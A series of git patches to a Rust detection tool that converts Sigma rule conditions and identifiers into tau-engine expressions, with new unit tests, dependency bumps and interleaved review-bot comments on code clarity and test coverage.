- // agg-function(agg-field) [ by group-field ] comparison-op value - if let Some(kind) = parts.next() { - if let Some(rest) = kind.strip_prefix("count(") { - if let Some(field) = rest.strip_suffix(")") { - if !field.is_empty() { - fields.push(field.to_owned()); - } - } else { - anyhow::bail!("invalid agg function"); - } - } else { - anyhow::bail!("unsupported agg function - {}", kind); - } } else { - anyhow::bail!("missing agg function"); + anyhow::bail!("condition must be a string"); } - let mut part = match parts.next() { - Some(part) => part, - None => anyhow::bail!("invalid aggregation"), - }; - if part == "by" { - let field = match parts.next() { - Some(field) => field, - None => anyhow::bail!("missing group field"), - }; - fields.push(field.to_owned()); - part = match parts.next() { - Some(part) => part, - None => anyhow::bail!("invalid aggregation"), - }; + } + _ => anyhow::bail!("condition must be a string"), + }; + let condition = if conditions.len() == 1 { + let (c, a) = conditions + .into_iter() + .map(|c| prepare_condition(c)) + .next() + .expect("could not get condition")?; + aggregate = a; + c + } else { + let mut scratch = Vec::with_capacity(conditions.len()); + for condition in conditions { + let (c, a) = prepare_condition(condition)?; + if a.is_some() { + anyhow::bail!("multiple aggregation expressions are not supported"); } - let number = match parts.next() { - Some(part) => part, - None => anyhow::bail!("invalid aggregation"), - }; - aggregate = Some(Aggregate { - count: format!("{}{}", part, number), - fields, - }); - condition - } else { - condition - }; - - let mut identifiers = detection.identifiers; - let mut index = 0; - let mut mutated = vec![]; - let mut parts = condition.split_whitespace(); - while let Some(part) = parts.next() { - let part = if let Some(part) = part.strip_prefix("(") { - mutated.push("(".to_owned()); - part - } else { - part - }; - match part { - "all" | "1" => { - if let Some(next) = parts.next() { - if next != "of" { 
- mutated.push(part.to_owned()); - mutated.push(next.to_owned()); - continue; - } + scratch.push(format!("({})", c)); + } + scratch.join(" or ") + }; - if let Some(ident) = parts.next() { - let mut bracket = false; - let ident = if let Some(ident) = ident.strip_suffix(")") { - bracket = true; - ident - } else { - ident - }; - if let Some(ident) = ident.strip_suffix("*") { - let mut scratch = vec![]; - let mut keys = vec![]; - for (k, _) in &identifiers { - if let Yaml::String(key) = k { - if key.starts_with(ident) { - keys.push(k.clone()); - } - } - } - for key in keys { - if let Some(v) = identifiers.get(&key) { - scratch.push(v.clone()); - } - } - if scratch.is_empty() { - anyhow::bail!("could not find any applicable identifiers"); - } - let key = format!("tau_{}", index); - if part == "all" { - mutated.push(format!("all({})", key)); - } else if part == "1" { - mutated.push(format!("of({}, 1)", key)); - } - identifiers.insert(Yaml::String(key), Yaml::Sequence(scratch)); - if bracket { - mutated.push(")".to_owned()); - } - index += 1; - continue; - } else { - if part == "all" { - mutated.push(format!("all({})", ident)); - } else if part == "1" { - mutated.push(format!("of({}, 1)", ident)); - } - if bracket { - mutated.push(")".to_owned()); - } - continue; - } + let mut identifiers = detection.identifiers; + if let Some(d) = extra { + for (k, v) in d.identifiers { + match identifiers.remove(&k) { + Some(i) => match (i, v) { + (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { + for (x, y) in v { + m.insert(x, y); } + identifiers.insert(k, Yaml::Mapping(m)); } - } - _ => {} - } - mutated.push(part.to_owned()); - } - let condition = mutated.join(" "); - if let Some(d) = extra { - for (k, v) in d.identifiers { - match identifiers.remove(&k) { - Some(i) => match (i, v) { - (Yaml::Mapping(mut m), Yaml::Mapping(v)) => { - for (x, y) in v { - m.insert(x, y); - } - identifiers.insert(k, Yaml::Mapping(m)); - } - (Yaml::Sequence(s), Yaml::Mapping(v)) => { - let mut z = vec![]; - 
for mut ss in s.into_iter() { - if let Some(m) = ss.as_mapping_mut() { - for (x, y) in v.clone() { - m.insert(x, y); - } + (Yaml::Sequence(s), Yaml::Mapping(v)) => { + let mut z = vec![]; + for mut ss in s.into_iter() { + if let Some(m) = ss.as_mapping_mut() { + for (x, y) in v.clone() { + m.insert(x, y); } - z.push(ss); } - identifiers.insert(k, Yaml::Sequence(z)); + z.push(ss); } - (_, _) => anyhow::bail!("unsupported rule collection format"), - }, - None => { - identifiers.insert(k, v); + identifiers.insert(k, Yaml::Sequence(z)); } + (_, _) => anyhow::bail!("unsupported rule collection format"), + }, + None => { + identifiers.insert(k, v); } } } - detection = Detection { - condition: Some(Yaml::String(condition)), - identifiers, - } + } + detection = Detection { + condition: Some(Yaml::String(condition.to_owned())), + identifiers, } } Ok((detection, aggregate)) 
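Review bot: The single-condition branch of `prepare` (hunk starting at L743) reaches the only element through `.map(|c| prepare_condition(c)).next().expect(...)?`, which is harder to follow than `let (c, a) = prepare_condition(conditions[0])?; aggregate = a; c` and leaves an `expect` that can never fire after the `match` above. `Some(Yaml::String(condition.to_owned()))` at the end clones a `String` that is already owned and could simply be moved. A one-line comment above the `scratch.join(" or ")` explaining why listed conditions are OR-ed while an aggregation on any of them is rejected would document the intended semantics for the next reader.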
@@ -460,44 +375,17 @@ fn detections_to_tau(detection: Detection) -> Result { // Handle condition statement let condition = match detection.condition { Some(conditions) => match conditions { - Yaml::Sequence(s) => { - let mut parts = vec![]; - for s in s { - let s = match s.as_str() { - Some(s) => s.to_string(), - None => { - return Err(anyhow!("{:?}", s).context("unsupported condition")); - } - }; - if s.unsupported() { - return Err(anyhow!("{:?}", s).context("unsupported condition")); - } - parts.push(format!("({})", s)); - } - parts.join(" or ") - } - Yaml::String(s) => { - if s.unsupported() { - return Err(anyhow!(s).context("unsupported condition")); - } - s - } + Yaml::String(s) => s, u => { return Err(anyhow!("{:?}", u).context("unsupported condition")); } }, None => bail!("missing condition"), }; - det.insert( - "condition".into(), - condition - .replace(" AND ", " and ") - .replace(" NOT ", " not ") - .replace(" OR ", " or ") - .into(), - ); // Handle identifiers + // NOTE: We can be inefficient here because the tree shaker will do the hard work for us! + let mut patches = HashMap::new(); for (k, v) in detection.identifiers { let k = match k.as_str() { Some(s) => s.to_string(), 
@@ -508,75 +396,237 @@ fn detections_to_tau(detection: Detection) -> Result { continue; //bail!("timeframe based rules cannot be converted"); } - let mut multi = false; - let blocks = match v { - Yaml::Sequence(s) => { - multi = true; - s + match v { + Yaml::Sequence(sequence) => { + let mut blocks = vec![]; + let mut index = 0; + for entry in sequence { + let mapping = match entry.as_mapping() { + Some(mapping) => mapping, + None => bail!("keyless identifiers cannot be converted"), + }; + let mut collect = true; + let mut seen = HashSet::new(); + let mut maps = vec![]; + for (f, v) in mapping { + let f = match f.as_str() { + Some(s) => s.to_string(), + None => bail!("[!] keys must strings"), + }; + let mut it = f.split('|'); + let mut f = it.next().expect("could not get field").to_string(); + if seen.contains(&f) { + collect = false; + } + seen.insert(f.clone()); + let modifiers: HashSet = it.map(|s| s.to_string()).collect(); + if modifiers.contains("all") { + f = format!("all({})", f); + } + let v = parse_identifier(&v, &modifiers)?; + let f = f.into(); + let mut map = Mapping::new(); + map.insert(f, v); + maps.push(map); + } + if collect { + let mut m = Mapping::new(); + for map in maps { + for (k, v) in map { + m.insert(k, v); + } + } + let ident = format!("{}_{}", k, index); + blocks.push((ident, m.into())); + } else { + let ident = format!("all({}_{})", k, index); + blocks.push(( + ident, + Yaml::Sequence(maps.into_iter().map(|m| m.into()).collect()), + )); + } + index += 1; + } + patches.insert( + k, + format!( + "({})", + blocks + .iter() + .map(|(k, _)| k) + .cloned() + .collect::>() + .join(" or "), + ), + ); + for (k, v) in blocks { + det.insert(k.into(), v.into()); + } + } + Yaml::Mapping(mapping) => { + let mut collect = true; + let mut seen = HashSet::new(); + let mut maps = vec![]; + for (f, v) in mapping { + let f = match f.as_str() { + Some(s) => s.to_string(), + None => bail!("[!] 
keys must strings"), + }; + let mut it = f.split('|'); + let mut f = it.next().expect("could not get field").to_string(); + if seen.contains(&f) { + collect = false; + } + seen.insert(f.clone()); + let modifiers: HashSet = it.map(|s| s.to_string()).collect(); + if modifiers.contains("all") { + f = format!("all({})", f); + } + let v = parse_identifier(&v, &modifiers)?; + let f = f.into(); + let mut map = Mapping::new(); + map.insert(f, v); + maps.push(map); + } + if collect { + let mut m = Mapping::new(); + for map in maps { + for (k, v) in map { + m.insert(k, v); + } + } + det.insert(k.into(), m.into()); + } else { + let ident = format!("all({})", k); + det.insert( + Yaml::String(k.clone()), + Yaml::Sequence(maps.into_iter().map(|m| m.into()).collect()), + ); + patches.insert(k, ident); + } } - Yaml::Mapping(m) => vec![Yaml::Mapping(m)], _ => { bail!("identifier blocks must be a mapping or a sequence of mappings"); } - }; - let mut maps = vec![]; - for v in blocks { - let mapping = match v.as_mapping() { - Some(m) => m, - None => bail!("keyless identifiers cannot be converted"), - }; - let mut fields = Mapping::new(); - for (f, v) in mapping { - let f = match f.as_str() { - Some(s) => s.to_string(), - None => bail!("[!] 
keys must strings"), - }; - let mut it = f.split('|'); - let mut f = it.next().expect("could not get field").to_string(); - let modifiers: HashSet = it.map(|s| s.to_string()).collect(); - if modifiers.contains("all") { - f = format!("all({})", f); - } - let v = parse_identifier(v, &modifiers)?; - let f = f.into(); - match fields.remove(&f) { - Some(x) => { - let s = match (x, v) { - (Yaml::Sequence(mut a), Yaml::Sequence(b)) => { - a.extend(b); - Yaml::Sequence(a) - } - (Yaml::Sequence(mut s), y) => { - s.push(y); - Yaml::Sequence(s) - } - (y, Yaml::Sequence(mut s)) => { - s.push(y); - Yaml::Sequence(s) + } + } + + let condition = condition + .replace(" AND ", " and ") + .replace(" NOT ", " not ") + .replace(" OR ", " or ") + .split_whitespace() + .map(|ident| { + let key = ident.trim_start_matches("(").trim_end_matches(")"); + match patches.get(key) { + Some(v) => ident.replace(key, v), + None => ident.to_owned(), + } + }) + .collect::>() + .join(" "); + + let condition = if condition == "all of them" { + let mut identifiers = vec![]; + for (k, _) in &det { + let key = k.as_str().expect("could not get key"); + match patches.get(key) { + Some(i) => identifiers.push(i.to_owned()), + None => identifiers.push(key.to_owned()), + } + } + identifiers.join(" and ") + } else if condition == "1 of them" { + let mut identifiers = vec![]; + for (k, _) in &det { + let key = k.as_str().expect("could not get key"); + match patches.get(key) { + Some(i) => identifiers.push(i.to_owned()), + None => identifiers.push(key.to_owned()), + } + } + identifiers.join(" or ") + } else { + let mut mutated = vec![]; + let mut parts = condition.split_whitespace(); + while let Some(part) = parts.next() { + let mut token = part; + while let Some(tail) = token.strip_prefix("(") { + mutated.push("(".to_owned()); + token = tail; + } + match token { + "all" | "1" => { + if let Some(next) = parts.next() { + if next != "of" { + mutated.push(token.to_owned()); + mutated.push(next.to_owned()); + 
continue; + } + + if let Some(next) = parts.next() { + let mut brackets = vec![]; + let mut identifier = next; + while let Some(head) = identifier.strip_suffix(")") { + brackets.push(")".to_owned()); + identifier = head; } - (Yaml::Mapping(_), _) | (_, Yaml::Mapping(_)) => { - bail!("could not merge identifiers") + if let Some(ident) = identifier.strip_suffix("*") { + let mut keys = vec![]; + for (k, _) in &det { + if let Yaml::String(key) = k { + if key.starts_with(ident) { + match patches.get(key) { + Some(i) => keys.push(i.to_owned()), + None => keys.push(key.to_owned()), + } + } + } + } + if keys.is_empty() { + anyhow::bail!("could not find any applicable identifiers"); + } + let expression = if token == "all" { + format!("({})", keys.join(" and ")) + } else if token == "1" { + format!("({})", keys.join(" or ")) + } else { + unreachable!(); + }; + mutated.push(expression); + } else { + let key = match patches.get(identifier) { + Some(i) => i, + None => identifier, + }; + let key = next.replace(identifier, &key); + if part == "all" { + mutated.push(format!("all({})", key)); + } else if part == "1" { + mutated.push(format!("of({}, 1)", key)); + } } - (a, b) => Yaml::Sequence(vec![a, b]), - }; - fields.insert(f, s); - } - None => { - fields.insert(f, v); + mutated.extend(brackets); + continue; + } } } + _ => {} } - maps.push(fields.into()); - } - if multi { - det.insert(k.into(), Yaml::Sequence(maps)); - } else { - det.insert(k.into(), maps.remove(0)); + mutated.push(token.to_owned()); } + mutated.join(" ").replace("( ", "(").replace(" )", ")") + }; + if condition.unsupported() { + return Err(anyhow!(condition).context("unsupported condition")); } + + det.insert("condition".into(), condition.into()); + tau.insert("detection".into(), det.into()); tau.insert("true_positives".into(), Sequence::new().into()); tau.insert("true_negatives".into(), Sequence::new().into()); + Ok(tau) } 
@@ -773,53 +823,7 @@ mod tests {
         "#;
 
         let detection: Detection = serde_yaml::from_str(&detection).unwrap();
-        let detection = prepare(detection, None).unwrap();
-        assert_eq!(detection, expected);
-    }
-
-    #[test]
-    fn test_prepare_all_of_them() {
-        let expected = r#"
-        A:
-          - string: abcd
-          - string: efgh
-        condition: all(A)
-        "#;
-        let expected: Detection = serde_yaml::from_str(&expected).unwrap();
-
-        let detection = r#"
-        A:
-          string: abcd
-        B:
-          string: efgh
-        condition: all of them
-        "#;
-
-        let detection: Detection = serde_yaml::from_str(&detection).unwrap();
-        let detection = prepare(detection, None).unwrap();
-        assert_eq!(detection, expected);
-    }
-
-    #[test]
-    fn test_prepare_one_of_them() {
-        let expected = r#"
-        A:
-          - string: abcd
-          - string: efgh
-        condition: of(A, 1)
-        "#;
-        let expected: Detection = serde_yaml::from_str(&expected).unwrap();
-
-        let detection = r#"
-        A:
-          string: abcd
-        B:
-          string: efgh
-        condition: 1 of them
-        "#;
-
-        let detection: Detection = serde_yaml::from_str(&detection).unwrap();
-        let detection = prepare(detection, None).unwrap();
+        let (detection, _) = prepare(detection, None).unwrap();
         assert_eq!(detection, expected);
     }
 
@@ -847,12 +851,12 @@ mod tests {
 
         let base: Detection = serde_yaml::from_str(&base).unwrap();
         let detection: Detection = serde_yaml::from_str(&detection).unwrap();
-        let detection = prepare(base, Some(detection)).unwrap();
+        let (detection, _) = prepare(base, Some(detection)).unwrap();
         assert_eq!(detection, expected);
     }
 
     #[test]
-    fn test_detection_to_tau() {
+    fn test_detection_to_tau_0() {
         let expected = r#"
         detection:
           A:
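Review bot: The rename of `test_detection_to_tau` to `test_detection_to_tau_0` in the `@@ -847` hunk gives the test a numeric suffix that says nothing about what distinguishes it from the `_all_of_them` and `_one_of_them` cases added in the same commit; a name describing the fixture, for example `fn test_detection_to_tau_modifiers_and_lists() {`, would keep the set readable as it grows. In the `@@ -773` hunk the second element of the tuple now returned by `prepare` is discarded with `_` in every surviving test, so nothing here asserts what `prepare` reports in it; if it carries the identifier rewrite mapping (not visible from this hunk) at least one test should check it.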
@@ -866,12 +870,19 @@ mod tests {
             number: 30
             string: iabcd
           B:
-            string:
-              - i*foobar*
-              - i*foobar
-              - ?foobar
-              - ifoobar*
-          condition: A and B
+            - string: i*foobar*
+            - string: i*foobar
+            - string: ?foobar
+            - string: ifoobar*
+          C_0:
+            string: i*foobar*
+          C_1:
+            string: i*foobar
+          C_2:
+            string: ?foobar
+          C_3:
+            string: ifoobar*
+          condition: A and all(B) and (C_0 or C_1 or C_2 or C_3)
         true_negatives: []
         true_positives: []
         "#;
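Review bot: The expected fixture shows the list-valued identifier `C` being expanded into the synthesised identifiers `C_0`…`C_3` joined with `or`, but no test in this hunk feeds an input that already defines an identifier spelt like one of those synthesised keys (say both `C` as a list and `C_0` as a map). Whether the conversion, which lives outside this hunk, reports that clash or silently overwrites one side is not visible here; a test with such an input, asserting either an error or two distinct identifiers in the output, would pin it. A comment above the fixture, `// list-valued identifiers are expanded to <name>_<index> and or-ed in the condition`, would also tell a reader why `C_0`…`C_3` appear in the expected output.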
@@ -893,10 +904,69 @@ mod tests {
           string|endswith: foobar
           string|re: foobar
           string|startswith: foobar
-        condition: A and B
+        C:
+          - string|contains: foobar
+          - string|endswith: foobar
+          - string|re: foobar
+          - string|startswith: foobar
+        condition: A and B and C
         "#;
         let detection: Detection = serde_yaml::from_str(&detection).unwrap();
         let detection = detections_to_tau(detection).unwrap();
         assert_eq!(detection, *expected.as_mapping().unwrap());
     }
+
+    #[test]
+    fn test_detection_to_tau_all_of_them() {
+        let expected = r#"
+        detection:
+          A:
+            string: iabcd
+          B:
+            string: iefgh
+          condition: A and B
+        true_negatives: []
+        true_positives: []
+        "#;
+        let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap();
+
+        let detection = r#"
+        A:
+          string: abcd
+        B:
+          string: efgh
+        condition: all of them
+        "#;
+
+        let detection: Detection = serde_yaml::from_str(&detection).unwrap();
+        let detection = detections_to_tau(detection).unwrap();
+        assert_eq!(detection, *expected.as_mapping().unwrap());
+    }
+
+    #[test]
+    fn test_detection_to_tau_one_of_them() {
+        let expected = r#"
+        detection:
+          A:
+            string: iabcd
+          B:
+            string: iefgh
+          condition: A or B
+        true_negatives: []
+        true_positives: []
+        "#;
+        let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap();
+
+        let detection = r#"
+        A:
+          string: abcd
+        B:
+          string: efgh
+        condition: 1 of them
+        "#;
+
+        let detection: Detection = serde_yaml::from_str(&detection).unwrap();
+        let detection = detections_to_tau(detection).unwrap();
+        assert_eq!(detection, *expected.as_mapping().unwrap());
+    }
 }
From 48557ae0aed1ca243086909a0067cf061c03686a Mon Sep 17 00:00:00 2001
From: Alex Kornitzer
Date: Tue, 21 Jun 2022 11:53:49 +0100
Subject: [PATCH 36/77] test: add a couple more tests for sigma parsing

---
 src/rule/sigma.rs | 62 +++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 62 insertions(+)

diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs
index 01080a02..891a7e7d 100644
--- a/src/rule/sigma.rs
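Review bot: The expected `condition: A and B` and `condition: A or B` in test_detection_to_tau_all_of_them and test_detection_to_tau_one_of_them only hold if the identifiers are emitted in document order, which presumably rests on serde_yaml's Mapping preserving insertion order — an assumption neither test states. A one-line comment above each expected fixture, `// identifiers are joined in the document order of the input`, would make the dependency explicit, and an input with a third identifier would show the join covers more than a pair. The two functions otherwise differ only in the keyword and the joining operator, so a small helper taking the condition and the expected operator would remove the duplicated fixture.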
+++ b/src/rule/sigma.rs
@@ -969,4 +969,66 @@ mod tests {
         let detection = detections_to_tau(detection).unwrap();
         assert_eq!(detection, *expected.as_mapping().unwrap());
     }
+
+    #[test]
+    fn test_detection_to_tau_all_of_selection() {
+        let expected = r#"
+        detection:
+          A:
+            string: iabcd
+          selection0:
+            string: iefgh
+          selection1:
+            string: iijkl
+          condition: A and (selection0 and selection1)
+        true_negatives: []
+        true_positives: []
+        "#;
+        let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap();
+
+        let detection = r#"
+        A:
+          string: abcd
+        selection0:
+          string: efgh
+        selection1:
+          string: ijkl
+        condition: A and all of selection*
+        "#;
+
+        let detection: Detection = serde_yaml::from_str(&detection).unwrap();
+        let detection = detections_to_tau(detection).unwrap();
+        assert_eq!(detection, *expected.as_mapping().unwrap());
+    }
+
+    #[test]
+    fn test_detection_to_tau_one_of_selection() {
+        let expected = r#"
+        detection:
+          A:
+            string: iabcd
+          selection0:
+            string: iefgh
+          selection1:
+            string: iijkl
+          condition: A and (selection0 or selection1)
+        true_negatives: []
+        true_positives: []
+        "#;
+        let expected: serde_yaml::Value = serde_yaml::from_str(&expected).unwrap();
+
+        let detection = r#"
+        A:
+          string: abcd
+        selection0:
+          string: efgh
+        selection1:
+          string: ijkl
+        condition: A and 1 of selection*
+        "#;
+
+        let detection: Detection = serde_yaml::from_str(&detection).unwrap();
+        let detection = detections_to_tau(detection).unwrap();
+        assert_eq!(detection, *expected.as_mapping().unwrap());
+    }
 }
From 550a94427e8c60e11b4cfd5545e74770a10a80af Mon Sep 17 00:00:00 2001
From: Alex Kornitzer
Date: Tue, 21 Jun 2022 23:01:48 +0100
Subject: [PATCH 37/77] fix: bring in tau optimisation fixes

---
 Cargo.lock | 71 ++++++++++++++++++++++++--------------------
 src/main.rs | 6 +++-
 src/rule/chainsaw.rs | 11 +++++--
 src/rule/mod.rs | 8 +++--
 4 files changed, 59 insertions(+), 37 deletions(-)

diff --git a/Cargo.lock b/Cargo.lock
index 69e397b1..3f6f8c1b 100644
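Review bot: The two new tests exercise `all of selection*` and `1 of selection*` only in the wildcard, unparenthesised form; the non-wildcard `all of <identifier>` branch and the bracket stripping around a token such as `(all of selection*)`, both handled by separate paths in detections_to_tau outside this hunk, get no case here. A third test with `condition: A and (1 of selection*)` expecting `A and (selection0 or selection1)`, and one with `condition: all of selection0`, would pin those paths. The expected fixtures also hard-code the leading `i` on every string (`iabcd`, `iefgh`); a comment saying what that prefix denotes (it appears to be the marker the conversion adds to every string) would help a reader who has not seen the rest of the module.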
--- a/Cargo.lock +++ b/Cargo.lock @@ -31,9 +31,9 @@ dependencies = [ [[package]] name = "anyhow" -version = "1.0.57" +version = "1.0.58" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08f9b8508dccb7687a1d6c4ce66b2b0ecef467c94667de27d8d7fe1f8d2a9cdc" +checksum = "bb07d2053ccdbe10e2af2995a2f116c1330396493dc1269f6a91d0ae82e19704" [[package]] name = "arrayref" @@ -273,9 +273,9 @@ dependencies = [ [[package]] name = "crossbeam-channel" -version = "0.5.4" +version = "0.5.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5aaa7bd5fb665c6864b5f963dd9097905c54125909c7aa94c9e18507cdbe6c53" +checksum = "4c02a4d71819009c192cf4872265391563fd6a84c81ff2c0f2a7026ca4c1d85c" dependencies = [ "cfg-if", "crossbeam-utils", @@ -294,26 +294,26 @@ dependencies = [ [[package]] name = "crossbeam-epoch" -version = "0.9.8" +version = "0.9.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1145cf131a2c6ba0615079ab6a638f7e1973ac9c2634fcbeaaad6114246efe8c" +checksum = "07db9d94cbd326813772c968ccd25999e5f8ae22f4f8d1b11effa37ef6ce281d" dependencies = [ "autocfg", "cfg-if", "crossbeam-utils", - "lazy_static", "memoffset", + "once_cell", "scopeguard", ] [[package]] name = "crossbeam-utils" -version = "0.8.8" +version = "0.8.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0bf124c720b7686e3c2663cf54062ab0f68a88af2fb6a030e87e30bf721fcb38" +checksum = "8ff1f980957787286a554052d03c7aee98d99cc32e09f6d45f0a814133c87978" dependencies = [ "cfg-if", - "lazy_static", + "once_cell", ] [[package]] 
@@ -532,13 +532,13 @@ dependencies = [ [[package]] name = "getrandom" -version = "0.2.6" +version = "0.2.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9be70c98951c83b8d2f8f60d7065fa6d5146873094452a1008da8c2f1e4205ad" +checksum = "4eb1a864a501629691edf6c15a593b7a51eebaa1e8468e9ddc623de7c9b58ec6" dependencies = [ "cfg-if", "libc", - "wasi 0.10.2+wasi-snapshot-preview1", + "wasi 0.11.0+wasi-snapshot-preview1", ] [[package]] @@ -549,9 +549,9 @@ checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" [[package]] name = "hashbrown" -version = "0.11.2" +version = "0.12.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ab5ef0d4909ef3724cc8cce6ccc8572c5c817592e9285f5464f8e86f8bd3726e" +checksum = "db0d4cf898abf0081f964436dc980e96670a0f36863e4b83aaacdb65c9d7ccc3" [[package]] name = "heck" @@ -582,9 +582,9 @@ dependencies = [ [[package]] name = "indexmap" -version = "1.8.2" +version = "1.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6012d540c5baa3589337a98ce73408de9b5a25ec9fc2c6fd6be8f0d39e0ca5a" +checksum = "10a35a97730320ffe8e2d410b5d3b69279b98d2c14bdb8b70ea89ecf7888d41e" dependencies = [ "autocfg", "hashbrown", @@ -850,9 +850,9 @@ dependencies = [ [[package]] name = "proc-macro2" -version = "1.0.39" +version = "1.0.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c54b25569025b7fc9651de43004ae593a75ad88543b17178aa5e1b9c4f15f56f" +checksum = "dd96a1e8ed2596c337f8eae5f24924ec83f5ad5ab21ea8e455d3566c69fbcaf7" dependencies = [ "unicode-ident", ] @@ -895,9 +895,9 @@ dependencies = [ [[package]] name = "quote" -version = "1.0.18" +version = "1.0.20" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1feb54ed693b93a84e14094943b84b7c4eae204c512b7ccb95ab0c66d278ad1" +checksum = "3bcdf212e9776fbcb2d23ab029360416bb1706b1aea2d1a5ba002727cbcab804" dependencies = [ "proc-macro2", ] 
@@ -1175,9 +1175,9 @@ dependencies = [ [[package]] name = "syn" -version = "1.0.96" +version = "1.0.98" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0748dd251e24453cb8717f0354206b91557e4ec8703673a4b30208f2abaf1ebf" +checksum = "c50aef8a904de4c23c788f104b7dddc7d6f79c647c7c8ce4cc8f73eb0ca773dd" dependencies = [ "proc-macro2", "quote", @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.7.1" +version = "1.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e0f34a4bc11778eb6faed8506f40bad0b1fb323b2538152c2e487b1b9b75b61" +checksum = "bed380712238073b1762daaa5857d6245e4a2ae443ecf6dadcefd822fbbfd9e0" dependencies = [ "aho-corasick 0.7.18", "lazy_static", @@ -1283,11 +1283,12 @@ dependencies = [ [[package]] name = "time" -version = "0.1.43" +version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ca8a50ef2360fbd1eeb0ecd46795a87a19024eb4b53c5dc916ca1fd95fe62438" +checksum = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" dependencies = [ "libc", + "wasi 0.10.0+wasi-snapshot-preview1", "winapi", ] @@ -1340,9 +1341,9 @@ dependencies = [ [[package]] name = "unicode-ident" -version = "1.0.0" +version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d22af068fba1eb5edcb4aea19d382b2a3deb4c8f9d475c589b6ada9e0fd493ee" +checksum = "5bd2fe26506023ed7b5e1e315add59d6f584c621d037f9368fea9cfb988f368c" [[package]] name = "unicode-segmentation" @@ -1368,7 +1369,7 @@ version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "dd6469f4314d5f1ffec476e05f17cc9a78bc7a27a6a857842170bdf8d6f98d2f" dependencies = [ - "getrandom 0.2.6", + "getrandom 0.2.7", "serde", ] 
@@ -1403,9 +1404,15 @@ checksum = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519"
 
 [[package]]
 name = "wasi"
-version = "0.10.2+wasi-snapshot-preview1"
+version = "0.10.0+wasi-snapshot-preview1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f"
+
+[[package]]
+name = "wasi"
+version = "0.11.0+wasi-snapshot-preview1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "fd6fbd9a79829dd1ad0cc20627bf1ed606756a7f77edff7b66b7064f9cb327c6"
+checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423"
 
 [[package]]
 name = "winapi"
diff --git a/src/main.rs b/src/main.rs
index def62e0f..015d36b3 100644
--- a/src/main.rs
+++ b/src/main.rs
@@ -339,7 +339,11 @@ fn run() -> Result<()> {
                             );
                             d.identifiers.clear();
                             d.expression =
-                                tau_engine::core::optimiser::shake(d.expression, true);
+                                tau_engine::core::optimiser::shake(d.expression);
+                            d.expression =
+                                tau_engine::core::optimiser::rewrite(d.expression);
+                            d.expression =
+                                tau_engine::core::optimiser::matrix(d.expression);
                             serde_yaml::to_string(&d)?
                         }
                         Filter::Expression(_) => {
diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs
index a56f107e..29cd9244 100644
--- a/src/rule/chainsaw.rs
+++ b/src/rule/chainsaw.rs
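Review bot: The three-step `shake` → `rewrite` → `matrix` pass over `d.expression` added here is written out again in the src/rule/chainsaw.rs `load` hunk of this commit, in both match arms, so the order of the optimiser passes now lives in three places that must be kept in step by hand. A single helper in the rule module that takes an expression through the three passes, called from both files, would define the pipeline once. The enclosing `run` function continues outside the hunk, and the dropped `true` argument to `shake` looks like it follows the tau-engine 1.7.1 → 1.8.0 bump in this commit's Cargo.lock hunk rather than an intentional behaviour change, which the commit message does not say.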
@@ -203,10 +203,17 @@ pub fn load(rule: &Path) -> crate::Result {
             detection.expression =
                 optimiser::coalesce(detection.expression, &detection.identifiers);
             detection.identifiers.clear();
-            detection.expression = optimiser::shake(detection.expression, true);
+            detection.expression = optimiser::shake(detection.expression);
+            detection.expression = optimiser::rewrite(detection.expression);
+            detection.expression = optimiser::matrix(detection.expression);
             Filter::Detection(detection)
         }
-        Filter::Expression(expression) => Filter::Expression(optimiser::shake(expression, true)),
+        Filter::Expression(expression) => Filter::Expression({
+            let expression = optimiser::shake(expression);
+            let expression = optimiser::rewrite(expression);
+            let expression = optimiser::matrix(expression);
+            expression
+        }),
     };
     Ok(rule)
 }
diff --git a/src/rule/mod.rs b/src/rule/mod.rs
index 90370378..8ada75c9 100644
--- a/src/rule/mod.rs
+++ b/src/rule/mod.rs
@@ -112,7 +112,9 @@ pub fn load_rule(path: &Path) -> crate::Result> {
                 fields: vec![],
-                filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection),
+                filter: chainsaw::Filter::Detection(
+                    rule.tau.optimise(Default::default()).detection,
+                ),
                 aggregate: rule.aggregate.map(|a| chainsaw::Aggregate {
                     count: a.count,
@@ -146,7 +148,9 @@ pub fn load_rule(path: &Path) -> crate::Result> {
                 fields: vec![],
-                filter: chainsaw::Filter::Detection(rule.tau.optimise(true, true).detection),
+                filter: chainsaw::Filter::Detection(
+                    rule.tau.optimise(Default::default()).detection,
+                ),
                 aggregate: None,
             },
From 577073f9168afbe5bf42d18430fe0b5ab11f00fb Mon Sep 17 00:00:00 2001
From: Alex Kornitzer
Date: Tue, 21 Jun 2022 23:02:16 +0100
Subject: [PATCH 38/77] build: bump to v2.0.0-alpha.5

---
 Cargo.lock | 2 +-
